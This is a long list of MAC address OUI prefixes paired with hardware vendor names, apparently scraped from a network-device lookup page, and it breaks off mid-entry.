Products +000486 ITTC, University of Kansas +000477 Scalant Systems +000476 3 Com +000469 Innocom +000470 ipUnplugged AB +00046A Navini Networks +000464 Pulse-Link +00045D Beka Elektronik +000457 Universal Access Technology +000451 Medrad +0003C1 Packet Dynamics +0003BD OmniCluster Technologies +0003B8 NetKit Solutions +0003B6 QSI +0003A6 Traxit Technology +0003AB Bridge Information Systems +0003A3 Mavix +00039F Cisco Systems +00039A SiConnect +00038C Total Impact +000384 Aeta +000387 Blaze Network Products +000306 Fusion In Tech +000303 Jama Electronics +0002FF Handan BroadInfoCom +0002F3 Media Serve +0002FA DX Antenna +0002ED DXO Telecom +0002E5 Timeware +0002E8 E.d.&a. +0002DC Fujitsu General Limited +0002E1 Integrated Network +0002D5 ACR +0002CE FoxJet +00B0DB Nextcell +00B08E Cisco Systems +00B01C Westport Technologies +00B02D ViaGate Technologies +00B03B HiQ Networks +0030A9 Netiverse +00B0F0 Caly Networks +00B086 LocSoft Limited +0030C4 Canon Imaging Systems +00309D Nimble Microsystems +003037 Packard Bell Nec Services +00302E Hoft & Wessel AG +00301B Shuttle +003028 Fase Saldatura srl +0030FB AZS Technology AG +0001DA Wincomm +0001DD Avail Networks +0001CE Custom Micro Products +0001CA Geocast Network Systems +0001B8 Netsensity +0001BD Peterson Electro-Musical Products +0001B4 Wayport +0001C3 Acromag +0001BF Teleforce +0001AD Coach Master International d.b.a. CMI Worldwide +00017E Adtek System Science +00018A ROI Computer AG +000119 RTUnet (Australia) +000125 Yaesu Musen +000121 Watchguard Technologies +000128 EnjoyWeb +000106 Tews Datentechnik GmbH +000112 Shark Multimedia +000102 3com +000115 Extratech +000109 Nagano Japan Radio +081443 Unibrain +00B0F5 NetWorth Technologies +00B019 UTC CCS +00B02A Orsys Gmbh +00B0AE Symmetricom +000181 Nortel Networks +00018D AudeSi Technologies +00019A Leunig Gmbh +000193 Hanbyul Telecom +0001A2 Logical +000196 Cisco Systems +0001A6 Scientific-Atlanta Arcodan A/S +000172 TechnoLand +00303F TurboComm Tech +003073 International Microsystems +00014D Shin Kin Enterprises +00016B LightChip +000167 Hioki E.E. +000215 Cotas Computer Technology A/B +000211 Nature Worldwide Technology +000209 Shenzhen SED Information Technology +000205 Hitachi Denshi +000202 Amino Communications +0001F6 Association of Musical Electronics Industry +0001ED Seta +0001E9 Litton Marine Systems +0002C6 Data Track Technology PLC +0002C2 Net Vision Telecom +0002B9 Cisco Systems +0002B4 Daphne +0002AD Hoya +0002A6 Effinet Systems +0002A1 World Wide Packets +00029B Kreatel Communications AB +00029E Information Equipment +000296 Lectron +00028F Globetek +000289 DNE Technologies +000285 Riverstone Networks +00027E Cisco Systems +000280 Mu Net +000279 Control Applications +000272 CC&C Technologies +00026B BCM Computers +00026D Adept Telecom +000262 Soyo Group Soyo Com Tech +000260 Accordion Networks +00025B Cambridge Silicon Radio +000087 Hitachi +000252 Carrier +00024B Cisco Systems +000246 All-Win Tech +00017A Chengdu Maipu Electric Industrial +000235 Paragon Networks International +000238 Serome Technology +000230 Intersoft Electronics +000229 Adtec +000225 One Stop Systems +00021C Network Elements +000221 DSP Application +00016E Conklin +00015B Italtel S.p.a/rf-up-i +000154 G3M +000150 Gilat Communications +00012E PC Partner +00013A Shelcad Communications +000141 Cable Print +000131 Bosch Security Systems +00013D RiscStation +000149 T.D.T. Transfer Data Test GmbH +00D047 XN Technologies +00D018 QWES. COM +00D048 Ecton +00D028 Harmonic +00D02F Vlsi Technology +00D025 Xrosstech +00D085 Otis Elevator Company +00D077 Lucent Technologies +00D093 TQ - Components Gmbh +00D013 Primex Aerospace Company +00D056 Somat +00D017 Syntech Information +00D036 Technology Atlanta +00D0D6 Aethra Telecomunicazioni +003078 Cisco Systems +003003 Phasys +0030D5 DResearch GmbH +0030CE Zaffire +003095 Procomp Informatics +003055 Renesas Technology America +0030B0 Convergenet Technologies +0030CC Tenor Networks +003013 NEC +003061 MobyTEL +00D0AB Deltakabel Telecom CV +00D0A8 Network Engines +00D01C SBS Technologies +00D0C0 Cisco Systems +00D051 O2 Micro +00D06D Acrison +0050A1 Carlo Gavazzi +00D06C Sharewave +00D03A Zoneworx +0050C1 Gemflex Networks +0050FB VSK Electronics +005033 Mayan Networks +0030A0 Tyco Submarine Systems +0030CB Omni Flow Computers +00306B Cmos Systems +003068 Cybernetics TECH. +0030E3 Sedona Networks +00D007 MIC Associates +00D07F Strategy & Technology, Limited +003085 Cisco Systems +003026 HeiTel Digital Video GmbH +0030A6 Vianet Technologies +003047 Nissei Electric +00D0FC Granite Microsystems +00D042 Mahlo Gmbh & UG +00D046 Dolby Laboratories +00D0BA Cisco Systems +00D0BC Cisco Systems +00D0D8 3Com +00D06B SR Telecom +0030AA Axus Microsystems +003043 Idream Technologies, PTE. +003010 Visionetics International +003096 Cisco Systems +003084 Allied Telesyn Internaional +0030CF TWO Technologies +00D0E3 Ele-chem Engineering +00D0ED Xiox +00D0C2 Balthazar Technology AB +00D0FB TEK Microsystems, Incorporated +00D082 Iowave +00D0AD TL Industries +00D0DB Mcquay International +00D06A Linkup Systems +00D065 Toko Electric +00D08F Ardent Technologies +00D0E7 Vcon Telecommunication +00D087 Microfirst +00D008 Mactell +003005 Fujitsu Siemens Computers +00304E Bustec Production +0030E0 Oxford Semiconductor +0030A1 Webgate +00303D IVA +0030C3 Flueckiger Elektronik AG +009047 Giga Fast E. +0090CB Wireless OnLine +00903F Aztec Radiomedia +001043 A2 +00108D Johnson Controls +00108E Hugh Symons Concept Technologies +001052 Mettler-toledo (albstadt) Gmbh +00100E Micro Linear Coporation +0010D7 Argosy Research +001059 Diablo Research +0010B6 Entrata Communications +001019 Sirona Dental Systems Gmbh & KG +001013 Kontron America +0090A4 Altiga Networks +00906C Sartorius Hamburg GmbH +0090FC Network Computing Devices +0090A3 Corecess +009022 Ivex +0090A5 Spectra Logic +0090BA Valid Networks +0090EE Personal Communications Technologies +0090CD Ent-empresa Nacional DE Telecommunicacoes +0090D0 Thomson Telecom Belgium +009075 NEC DO Brasil +00902E Namco Limited +0090A0 8X8 +00907C Digitalcast +0090DF Mitsubishi Chemical America +009023 Zilog +00908A Bayly Communications +009063 Coherent Communications Systems +009041 Applied Digital Access +0090D8 Whitecross Systems +009011 Wavtrace +009040 Siemens Network Convergence +0090C7 Icom +009035 Alpha Telecom +009087 Itis +00906E Praxon +009039 Shasta Networks +00909A ONE World Systems +009053 Daewoo Electronics +00909E Critical IO +0090C2 JK microsystems +009091 DigitalScape +0090ED Central System Research +00901B Digital Controls +00905C Edmi +0090D2 Artel Video Systems +00508C RSI Systems +00502D Accel +0050B8 Inova Computers Gmbh & KG +00503A Datong Electronics +00508E Optimation +0050BB CMS Technologies +005051 Iwatsu Electric +0050BE Fast Multimedia AG +0050AD CommUnique Wireless +005003 Xrite +005023 PG Design Electronics +005039 Mariner Networks +00505A Network Alchemy +005071 Aiwa +009071 Applied Innovation +009031 Mysticom +00901F Adtec Productions +009081 Aloha Networks +0090B3 Agranat Systems +00500D Satori Electoric +0050EC Olicom A/S +005083 Gilbarco +0050CF Vanlink Communication Technology Research Institute +005008 Tiva Microcomputer (tmc) +005001 Yamashita Systems +0050B0 Technology Atlanta +00504E Sierra Monitor +00504D Tokyo Electron Device Limited +0050F7 Venture Manufacturing (singapore) +005029 1394 Printer Working Group +00E08D Pressure Systems +00E040 DeskStation Technology +00E0D6 Computer & Communication Research LAB. +00E07E Walt Disney Imagineering +00E094 Osai SRL +00E032 Misys Financial Systems +00E06B W&G Special Products +00E01C Cradlepoint +00E076 Development Concepts +00E0A7 IPC Information Systems +00E0A4 Esaote +00E080 Control Resources +00E0CC Hero Systems +00E099 Samson AG +0010E9 Raidtec +001003 Imatron +00105A 3com +0010A9 Adhoc Technologies +000400 Lexmark International +00101A PictureTel +001097 WinNet Metropolitan Communications Systems +00106F Trenton Technology +0010DA Kollmorgen +0010DF Rise Computer +00109E Aware +001072 GVN Technologies +00E019 ING. Giordano Elettronica +00E0D7 Sunshine Electronics +00E068 Merrimac Systems +00E01D Webtv Networks +00E01F Avidia Systems +00E056 Holontech +00E0C9 AutomatedLogic +00E030 Melita International +00E0BA Berghof Automationstechnik Gmbh +00E0B2 Telmax Communications +00E0EF Dionex +00E0BD Interface Systems +00E071 Epis Microcomputer +00E0A6 Telogy Networks +00E026 Redlake Masd +00E0B8 Gateway 2000 +00E088 Ltx-credence +00E07C Mettler-toledo +00E08C Neoparadigm LABS +00E061 EdgePoint Networks +00E06E FAR Systems +00E01B Sphere Communications +00E0AE Xaqti +00E0C8 Virtual Access +00101D Winbond Electronics +00105F Zodiac Data Systems +0010CB Facit K.K. +001075 Segate Technology +001058 ArrowPoint Communications +0010A8 Reliance Computer +0010AA Media4 +0010E8 Telocity, Incorporated +001010 Initio +00E007 Avaya ECS +001022 SatCom Media +0010C7 Data Transmission Network +001098 Starnet Technologies +001096 Tracewell Systems +001082 JNA Telecommunications Limited +001021 Encanto Networks +0010CE Volamp +0010B2 Coactive Aesthetics +00109A Netline +0010EA Adept Technology +0010BD THE Telecommunication Technology Committee (ttc) +006099 SBE +0060FD NetICs +0060B5 Keba Gmbh +006027 Superior Modular Products +0060C1 WaveSpan +006005 Feedback Data +00607B Fore Systems +00609C Perkin-Elmer Incorporated +006007 Acres Gaming +006035 Dallas Semiconductor +0060F1 EXP Computer +006040 Netro +006034 Robert Bosch Gmbh +0060BA Sahara Networks +006096 T.S. Microtech +00603A Quick Controls +0060AC Resilience +0060EB Fourthtrack Systems +00606D Digital Equipment +006014 Edec +0060E1 Orckit Communications +006062 Telesync +006038 Nortel Networks +006095 Accu-time Systems +00A016 Micropolis +00A01C Nascent Networks +00A0FC Image Sciences +00A0B7 Cordant +00A037 Mindray DS USA +00A04C Innovative Systems & Technologies +00A0E9 Electronic Retailing Systems International +006078 Power Measurement +00600D Digital Logic GmbH +00608A Citadel Computer +00A05D CS Computer Systeme Gmbh +00A0BD I-tech +00A0B9 Eagle Technology +00A069 Symmetricom +00A07A Advanced Peripherals Technologies +00A04E Voelker Technologies +00A05A Kofax Image Products +00A093 B/E Aerospace +00A0BF Wireless Data Group Motorola +00609F Phast +006067 Acer Netxus +00600C Eurotech +006025 Active Imaging PLC +006071 Midas LAB +0060A7 Microsens Gmbh & KG +0060FC Conservation Through Innovation +0060D4 Eldat Communication +006085 Storage Concepts +006018 Stellar ONE +00602B Peak Audio +00606F Clarion OF America +0060ED Ricardo Test Automation +0060F6 Nextest Communications Products +0060DD Myricom +006092 Micro/sys +006080 Microtronix Datacom +006068 Dialogic +0060DB NTP Elektronik A/S +00A002 Leeds & Northrup Australia +00A0E4 Optiquest +00A01F Tricord Systems +00A0C0 Digital Link +00A043 American Technology LABS +00A047 Integrated Fitness +00A07C Tonyang Nylon +00A0EC Transmitton +00A07E Avid Technology +00A035 Cylink +00A028 Conner Peripherals +00A0C7 Tadiran Telecommunications +00E0BE Genroco International +00E010 Hess Sb-automatenbau Gmbh +00E0E9 Data LABS +00E0A0 Wiltron +00E024 Gadzoox Networks +00E017 Exxact Gmbh +00603B Amtec spa +0020E5 Apex DATA +00207D Advanced Computer Applications +0020D0 Versalynx +00206C Evergreen Technology +002012 Camtronics Medical Systems +00200B Octagon Systems +00209E Brown's Operating System Services +0020D7 Japan Minicomputer Systems +0020FB Octel Communications +0020B1 Comtech Research +002033 Synapse Technologies +002099 BON Electric +0020AE Ornet Data Communication TECH. +0020EA Efficient Networks +0020FF Symmetrical Technologies +00208B Lapis Technologies +002069 Isdn Systems +0020BA Center FOR High Performance +002006 Garrett Communications +00A0A2 Digicom +00A054 Private +00A030 Captor Nv/sa +00A0B1 First Virtual +0020CB Pretec Electronics +0020AB Micro Industries +00202D Taiyo +00A088 Essential Communications +00A0FA Marconi Communication GmbH +00A014 Csir +00A064 Kvb/analect +00A07F Gsm-syntel +00A03E ATM Forum +00A098 NetApp +00A021 General Dynamics +00A0A8 Renex +002049 Comtron +002050 Korea Computer +00203C Eurotime AB +002028 West EGG Systems +002014 Global View +002053 Huntsville Microsystems +002001 DSP Solutions +00209C Primary Access +0020C5 Eagle Technology +002009 Packard Bell Elec. +002095 Riva Electronics +00203F Juki +00C014 Telematics Calabasas Int'l +00C045 Isolation Systems +00C000 Lanoptics +00AA3C Olivetti Telecom SPA (olteco) +00C079 Fonsys +002011 Canopus +00C00B Norcontrol A.S. +00C0C0 Shore Microsystems +00C00C Relia Technolgies +00A0E7 Central Data +00A068 BHP Limited +00A0B3 Zykronix +00A06E Austron +00A0BB Hilan Gmbh +00A017 J B M +0020D5 Vipa Gmbh +002079 Mikron Gmbh +0020FA GDE Systems +002007 SFA +002062 Scorpion Logic +00200A Source-comm +002000 Lexmark International +002003 Pixel Power +0020B4 Terma Elektronik AS +00205B Kentrox +002030 Analog & Digital Systems +0020A8 Sast Technology +002066 General Magic +002036 BMC Software +0040BE Boeing Defense & Space +004036 Zoom Telephonics +004046 UDC Research Limited +00406A Kentek Information Systems +0040F2 Janich & Klass Computertechnik +004082 Laboratory Equipment +004022 Klever Computers +0040A2 Kingstar Technology +0040B4 Nextcom K.K. +0040D4 Gage Talker +004038 Talent Electric Incorporated +004018 Adobe Systems +0040B0 Bytex, Engineering +004040 Ring Access +0080D7 Fantum Engineering +0080D9 EMK Elektronik GmbH & KG +00806A ERI (empac Research) +00403B Synerjet International +0040AB Roland DG +0040D5 Sartorius Mechatronics T&H GmbH +004027 SMC Massachusetts +00409C Transware +00405C Future Systems +00008C Alloy Computer Products (Australia) +004000 PCI Componentes DA Amzonia +0040C5 Micom Communications +004023 Logic +0040A4 Rose Electronics +004048 SMD Informatica +004025 Molecular Dynamics +004010 Sonic Systems +0040CA First Internat'l Computer +004050 Ironics, Incorporated +00402B Trigem Computer +00C08C Performance Technologies +00C02B Gerloff Gesellschaft FUR +00C0A7 Seel +0040B3 ParTech +00407D Extension Technology +004079 Juko Manufacture Company +0040D9 American Megatrends +004011 Andover Controls +0040C1 Bizerba-werke Wilheim Kraut +00C06B OSI Plus +00C06A Zahner-elektrik Gmbh & KG +00C097 Archipel SA +00C072 KNX +00C0EC Dauphin Technology +00C066 Docupoint +00C028 Jasco +00C0DC EOS Technologies +00C02D Fuji Photo Film +00C0BD Inex Technologies +00C054 Network Peripherals +00C0D5 Werbeagentur Jrgen Siebert +00C044 Emcom +00C050 Toyo Denki Seizo K.K. +00408A TPS Teleprocessing SYS. Gmbh +0040FD LXE +00403D Teradata +0040E0 Atomwide +00408C Axis Communications AB +004068 Extended Systems +0040BA Alliant Computer Systems +004069 Lemcom Systems +0040F8 Systemhaus Discom +004077 Maxton Technology +0040E7 Arnos Instruments & Computer +0040AC Super Workstation +00C0AC Gambit Computer Communications +00C02C Centrum Communications +00C0ED US Army Electronic +00C0D1 Comtree Technology +00C0D2 Syntellect +00C0FB Advanced Technology Labs +00C092 Mennen Medical +00C06C Svec Computer +00C02E Netwiz +00C05B Networks Northwest +00C0BF Technology Concepts +00C0C9 Elsag Bailey Process +00809D Commscraft +008017 PFU Limited +0080F8 Mizar +008024 Kalpana +008074 Fisher Controls +008021 Alcatel Canada +000055 Commissariat A L`energie ATOM. +000086 Megahertz +000092 Cogent Data Technologies +008068 Yamatech Scientific +0080F2 Raycom Systems +0080EA Adva Optical Networking +000067 Soft * RITE +0000E8 Accton Technology +0000B2 Televideo Systems +0000EE Network Designers +000089 Cayman Systems +000021 Sureman COMP. & Commun. +0000CF Hayes Microcomputer Products +0000A4 Acorn Computers Limited +000018 Webster Computer +008033 EMS Aviation +008052 Technically Elite Concepts +00804F Daikin Industries +00806D Century Systems +00802D Xylogics +008048 Compex Incorporated +008085 H-three Systems +008014 Esprit Systems +0080B4 Sophia Systems +00807F Dy-4 Incorporated +0000E4 IN2 Groupe Intertechnique +000079 Networth Incorporated +000075 Nortel Networks +004009 Tachibana Tectron +00409E Concurrent Technologies +008092 Silex Technology +008011 Digital Systems Int'l. +008044 Systech Computer +00808A Summit Microsystems +0080E3 Coral Network +008072 Microplex Systems +008054 Frontier Technologies +0080AE Hughes Network Systems +0080AF Allumer +0080EC Supercomputing Solutions +0080A4 Liberty Electronics +008073 DWB Associates +00802B Integrated Marketing +0080BE Aries Research +008027 Adaptive Systems +0080E2 T.d.i. +0040EE Optimem +00405E North Hills Israel +004072 Applied Innovation +004031 Kokusai Electric +00400C General Micro Systems +0040E6 C.a.e.n. +0040FC IBR Computer Technik Gmbh +004001 Zero One Technology +004002 Perle Systems Limited +0080DB Graphon +0080B1 Softcom A/S +0080D8 Network Peripherals +0080AB Dukane Network Integration +00809B Justsystem +008089 Tecnetics (pty) +000039 Toshiba +0000CB Compu-shack Electronic Gmbh +0000D1 Adaptec Incorporated +0000B6 Micro-matic Research +000066 Talaris Systems +000014 Netronix +000072 Miniware Technology +0000AB Logic Modeling +000029 IMC Networks +0080CD Micronics Computer +008083 Amdahl +008003 Hytec Electronics +00801B Kodiak Technology +0080CC Microwave Bypass Systems +080079 THE Droid Works +080077 TSL Communications +080071 Matra (dsie) +08005F Saber Technology +08005C Four Phase Systems +08005B VTA Technologies +080058 Systems Concepts +080050 Daisy Systems +080052 Insystec +080047 Sequent Computer Systems +080045 Concurrent Computer +080044 David Systems +080041 Racal-milgo Information SYS.. +080038 Bulls. +08003C Schlumberger Well Services +080034 Filenet +08002C Britton LEE +0000B9 Mcdonnell Douglas Computer SYS +00002D Chromatics +00004A ADC Codenoll Technology +0000C0 Western Digital +000040 Applicon +00005D CS Telecom +08008E Tandem Computers +080086 Konica Minolta Holdings +080083 Seiko Instruments +080080 AES Data +080030 Royal Melbourne Inst OF Tech +080064 Sitasys AG +00DD09 Ungermann-bass +08008A PerfTech +00DD04 Ungermann-bass +080066 Agfa +08001A Tiara/ 10net +080090 Sonoma Systems +08000B Unisys +080017 National Semiconductor +00005E Icann, Iana Department +0000AF Canberra Industries +0000EC Microprocess +00009E Marli +000042 Metier Management Systems +00008D Cryptek +000065 Network General +00004D DCI +080024 10net Communications/dca +08001E Apollo Computer +00DD0D Ungermann-bass +AA0002 Digital Equipment +080005 Symbolics +000000 Xerox +0040D6 Locamation +AA0003 Digital Equipment +080008 Bolt Beranek AND Newman +08000E NCR +00006F Madge +00005A SysKonnect GmbH +000023 ABB Industrial Systems AB +000045 Ford Aerospace & COMM. +0000BC Rockwell Automation +0000C3 Harris Computer SYS DIV +000004 Xerox +000009 Xerox +00003D Unisys +F82C18 2Wire +00173F Belkin International +388602 Flexoptix GmbH +F4EB38 Sagemcom Broadband SAS +001E74 Sagemcom Broadband SAS +00604C Sagemcom Broadband SAS +002691 Sagemcom Broadband SAS +C0D044 Sagemcom Broadband SAS +6C2E85 Sagemcom Broadband SAS +CC33BB Sagemcom Broadband SAS +681590 Sagemcom Broadband SAS +5464D9 Sagemcom Broadband SAS +00023F Compal Electronics +383BC8 2Wire +DC7FA4 2Wire +001288 2Wire +001EC7 2Wire +28162E 2Wire +3CEA4F 2Wire +848F69 Dell +90B11C Dell +F8CAB8 Dell +24B6FD Dell +000D56 Dell +00123F Dell +001372 Dell +74867A Dell +3417EB Dell +EC8892 Motorola Mobility, a Lenovo Company +B07994 Motorola Mobility, a Lenovo Company +141AA3 Motorola Mobility, a Lenovo Company +CCC3EA Motorola Mobility, a Lenovo Company +34BB26 Motorola Mobility, a Lenovo Company +40786A Motorola Mobility, a Lenovo Company +0019B9 Dell +002219 Dell +00B0D0 Dell +5C260A Dell +B083FE Dell +141877 Dell +0024E8 Dell +A48E0A DeLaval International AB +00215C Intel Corporate +002315 Intel Corporate +001500 Intel Corporate +104A7D Intel Corporate +A4C494 Intel Corporate +902E1C Intel Corporate +3CFDFE Intel Corporate +B8BF83 Intel Corporate +001DE1 Intel Corporate +0022FB Intel Corporate +081196 Intel Corporate +6036DD Intel Corporate +A0369F Intel Corporate +502DA2 Intel Corporate +4C79BA Intel Corporate +4CEB42 Intel Corporate +606720 Intel Corporate +84A6C8 Intel Corporate +5891CF Intel Corporate +88532E Intel Corporate +0024D7 Intel Corporate +C40938 Fujian Star-net Communication +00AA02 Intel +5CD2E4 Intel Corporate +04BD88 Aruba Networks +000B86 Aruba Networks +8896F2 Valeo Schalter und Sensoren GmbH +80A589 AzureWave Technology +0CCC26 Airenetworks +4CB0E8 Beijing RongZhi xinghua technology +4C14A3 TCL Technoly Electronics (Huizhou) +F48E38 Dell +D887D5 Leadcore Technology +00DA55 Cisco Systems +80D21D AzureWave Technology +705A0F Hewlett Packard +586356 Fn-link Technology Limited +B046FC MitraStar Technology +08A95A AzureWave Technology +6CADF8 AzureWave Technology +54271E AzureWave Technology +008C54 ADB Broadband Italia +F0842F ADB Broadband Italia +8CB864 AcSiP Technology +0020E0 Actiontec Electronics +0004E3 Accton Technology +409558 Aisino +00D0C9 Advantech +002553 ADB Broadband Italia +00238E ADB Broadband Italia +001CA2 ADB Broadband Italia +0017C2 ADB Broadband Italia +D0D412 ADB Broadband Italia +000FA3 Alpha Networks +001D6A Alpha Networks +0000F4 Allied Telesis +70F1A1 Liteon Technology +6CFAA7 Ampak Technology +0024EF Sony Mobile Communications AB +6C0E0D Sony Mobile Communications AB +B4527D Sony Mobile Communications AB +E063E5 Sony Mobile Communications AB +000E07 Sony Mobile Communications AB +001A75 Sony Mobile Communications AB +0016B8 Sony Mobile Communications AB +001D28 Sony Mobile Communications AB +001FE4 Sony Mobile Communications AB +002298 Sony Mobile Communications AB +24FD52 Liteon Technology +2016D8 Liteon Technology +9CB70D Liteon Technology +1C659D Liteon Technology +001B9E Askey Computer +E0CA94 Askey Computer +C0D962 Askey Computer +00150C AVM GmbH +F40B93 BlackBerry RTS +68ED43 BlackBerry RTS +34BB1F BlackBerry RTS +489D24 BlackBerry RTS +000F86 BlackBerry RTS +001333 BaudTec +507E5D Arcadyan Technology +849CA6 Arcadyan Technology +1CC63C Arcadyan Technology +C02506 AVM GmbH +0896D7 AVM GmbH +4C09D4 Arcadyan Technology +DC446D Allwinner Technology +BC620E Huawei Technologies +78F557 Huawei Technologies +E02861 Huawei Technologies +C4473F Huawei Technologies +000AF7 Broadcom +000DB6 Broadcom +18C086 Broadcom +C03E0F BSkyB +0020D4 Cabletron Systems +00001D Cabletron Systems +0060BB Cabletron Systems +D0542D Cambridge Industries(Group) +001FC7 Casio Hitachi Mobile Communications +ACEE9E Samsung Electronics +C08997 Samsung Electronics +2827BF Samsung Electronics +F05B7B Samsung Electronics +7CF90E Samsung Electronics +AC5A14 Samsung Electronics +B0C559 Samsung Electronics +BCD11F Samsung Electronics +A0B4A5 Samsung Electronics +80656D Samsung Electronics +48137E Samsung Electronics +E83A12 Samsung Electronics +9C0298 Samsung Electronics +6C8336 Samsung Electronics +B8C68E Samsung Electronics +74458A Samsung Electronics +A49A58 Samsung Electronics +B4EF39 Samsung Electronics +14A364 Samsung Electronics +3CA10D Samsung Electronics +206E9C Samsung Electronics +183F47 Samsung Electronics +0C715D Samsung Electronics +0C1420 Samsung Electronics +A80600 Samsung Electronics +6CF373 Samsung Electronics +3872C0 Comtrend +F4068D devolo AG +000BCA Datavan TC +00507F DrayTek +3C8970 Neosfar +C43655 Shenzhen Fenglian Technology +78CB68 Daehap Hyper-tech +001A7F GCI Science & Technology +D04D2C Roku +E00C7F Nintendo +58BDA3 Nintendo +0025A0 Nintendo +002659 Nintendo +8C56C5 Nintendo +CC9E00 Nintendo +001656 Nintendo +00191D Nintendo +0019FD Nintendo +001EA9 Nintendo +A84481 Nokia +8844F6 Nokia +A87B39 Nokia +14C126 Nokia +4C2578 Nokia +001EA4 Nokia Danmark A/S +001262 Nokia Danmark A/S +00174B Nokia Danmark A/S +002547 Nokia Danmark A/S +001DE9 Nokia Danmark A/S +001D3B Nokia Danmark A/S +0014A7 Nokia Danmark A/S +001CD6 Nokia Danmark A/S +D099D5 Alcatel-Lucent +DC0077 TP-Link Technologies +0060DC NEC Magnus Communications +F45C89 Apple +0021FD Lacroix TrafficU +4CB44A Nanowave Technologies +78C3E9 Samsung Electronics +9C5C8E Asustek Computer +70884D Japan Radio +4C55CC Zentri +BCEC5D Apple +DC415F Apple +30636B Apple +84683E Intel Corporate +C88722 Lumenpulse +30A9DE LG Innotek +E0CDFD Beijing E3Control Technology +208B37 Skyworth Digital Technology(Shenzhen) +08BE77 Green Electronics +280C28 Unigen DataStorage +980CA5 Motorola (Wuhan) Mobility Technologies Communication +1CC035 Planex Communications +34543C Takaoka Toko +D49524 Clover Network +9046A2 Tedipay UK +6479A7 Phison Electronics +C83870 Samsung Electronics +288335 Samsung Electronics +44783E Samsung Electronics +202D07 Samsung Electronics +0452C7 Bose +D4612E Huawei Technologies +1C6758 Huawei Technologies +E85659 Advanced-Connectek +8801F2 Vitec System Engineering +FC084A Fujitsu Limited +847BEB Dell +689361 Integrated Device Technology (Malaysia) Sdn. Bhd. +A082AC Linear DMS Solutions Sdn. Bhd. +002697 Alpha Technologies +4CB8B5 Shenzhen Youhua Technology +1CABC0 Hitron Technologies. +84E323 Green Wave Telecommunication SDN BHD +D897BA Pegatron +7071BC Pegatron +E06995 Pegatron +54D9E4 Brilliantts +E4F3F5 Shenzhen Mercury Communication Technologies +00089F EFM Networks +00185C Edslab Technologies +00020E ECI Telecom +00115B Elitegroup Computer Systems +000795 Elitegroup Computer Systems +B8AEED Elitegroup Computer Systems +C03FD5 Elitegroup Computer Systems +7427EA Elitegroup Computer Systems +0000C9 Emulex +001A45 GN Netcom A/S +00168F GN Netcom A/S +083FBC zte +042AE2 Cisco Systems +1C1B0D Giga-byte Technology +00104F Oracle +000782 Oracle +E42F56 OptoMET GmbH +00A045 Phoenix Contact Electronics Gmbh +00266C Inventec +001E25 Intek Digital +A0B662 Acutvista Innovation +00C0F0 Kingston Technology Company +4C8FA5 Jastec +000C49 Dangaard Telecom Denmark A/S +CCE17F Juniper Networks +44F477 Juniper Networks +5C4527 Juniper Networks +F01C2D Juniper Networks +F8C001 Juniper Networks +78FE3D Juniper Networks +54E032 Juniper Networks +3C6104 Juniper Networks +BC7574 Huawei Technologies +20A680 Huawei Technologies +0019E2 Juniper Networks +001F12 Juniper Networks +0024DC Juniper Networks +50C58D Juniper Networks +000585 Juniper Networks +003146 Juniper Networks +80ACAC Juniper Networks +50DD4F Automation Components +904D4A Sagemcom Broadband SAS +7C79E8 PayRange +540593 Woori Elec +A067BE Sicon srl +C4CAD9 Hangzhou H3C Technologies, Limited +74258A Hangzhou H3C Technologies, Limited +70F96D Hangzhou H3C Technologies, Limited +00260F Linn Products +F845AD Konka Group +000358 Hanyang DigitechLtd +000761 29530 +60512C TCT mobile +905F2E TCT mobile +4C0B3A TCT mobile +C02FF1 Volta Networks +4882F2 Appel Elektronik GmbH +0C5101 Apple +086D41 Apple +04D3CF Apple +30C82A WI-BIZ srl +0062EC Cisco Systems +0C8A87 AgLogica Holdings +34A2A2 Huawei Technologies +20F17C Huawei Technologies +34B354 Huawei Technologies +749D8F Huawei Technologies +346AC2 Huawei Technologies +C83DFC Pioneer DJ +0016FB Shenzhen MTC +381DD9 Fn-link Technology Limited +6C9522 Scalys +8C59C3 ADB Italia +60C0BF ON Semiconductor +98398E Samsung Electronics +348A7B Samsung Electronics +BC765E Samsung Electronics +E0A8B8 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited +B88198 Intel Corporate +E4FB8F Mobiwire Mobiles (ningbo) +78009E Samsung Electronics +C8AFE3 Hefei Radio Communication Technology +7C3548 Transcend Information +E83A97 Toshiba +9C8ECD Amcrest Technologies +282536 Shenzhen Holatek +FCA89A Sunitec Enterprise +B8F8BE Bluecom +6073BC zte +90EED9 Universal DE Desarrollos Electrnicos +043110 Inspur Group +00215B SenseAnywhere +C816BD Qingdao Hisense Communications +587E61 Qingdao Hisense Communications +340AFF Qingdao Hisense Communications +F85A00 Sanford LP +5067F0 ZyXEL Communications +C86C87 ZyXEL Communications +D8E0B8 Bulat +68C44D Motorola Mobility, a Lenovo Company +48FCB6 Lava International(h.k) Limited +CC3540 Technicolor CH USA +C42795 Technicolor CH USA +58238C Technicolor CH USA +705A9E Technicolor CH USA +80C6AB Technicolor CH USA +90A4DE Wistron Neweb +3C970E Wistron InfoComm(Kunshan)Co. +30144A Wistron Neweb +A854B2 Wistron Neweb +38BC1A Meizu Technology +0004A3 Microchip Technology +982F3C Sichuan Changhong Electric +380DD4 Primax Electronics +98FDB4 Primax Electronics +00157D Posdata +F8E61A Samsung Electronics +888322 Samsung Electronics +84B541 Samsung Electronics +18DC56 Yulong Computer Telecommunication Scientific (Shenzhen) +001F46 Nortel Networks +001F0A Nortel Networks +00130A Nortel Networks +001E7E Nortel Networks +001C9C Nortel Networks +000CF8 Nortel Networks +000CF7 Nortel Networks +001E1F Nortel Networks +001C17 Nortel Networks +00182E XStreamHD +50016B Huawei Technologies +58986F Revolution Display +28AC67 Mach Power, Rappresentanze Internazionali s.r.l. +B0B28F Sagemcom Broadband SAS +DC1A01 Ecoliv Technology ( Shenzhen ) +7CFE90 Mellanox Technologies +0002C9 Mellanox Technologies +D05FB8 Texas Instruments +C4BE84 Texas Instruments +78A504 Texas Instruments +7C669D Texas Instruments +D03972 Texas Instruments +E0E5CF Texas Instruments +7CEC79 Texas Instruments +74D6EA Texas Instruments +0017EB Texas Instruments +883314 Texas Instruments +84DD20 Texas Instruments +1C4593 Texas Instruments +5C6B32 Texas Instruments +0017E4 Texas Instruments +D03761 Texas Instruments +0024BA Texas Instruments +0022A5 Texas Instruments +0021BA Texas Instruments +001833 Texas Instruments +D8952F Texas Instruments +649C8E Texas Instruments +F4FC32 Texas Instruments +74DAEA Texas Instruments +04A316 Texas Instruments +98072D Texas Instruments +001AB6 Texas Instruments +C8A030 Texas Instruments +34B1F7 Texas Instruments +C4EDBA Texas Instruments +A40DBC Xiamen Intretech +EC8EAE 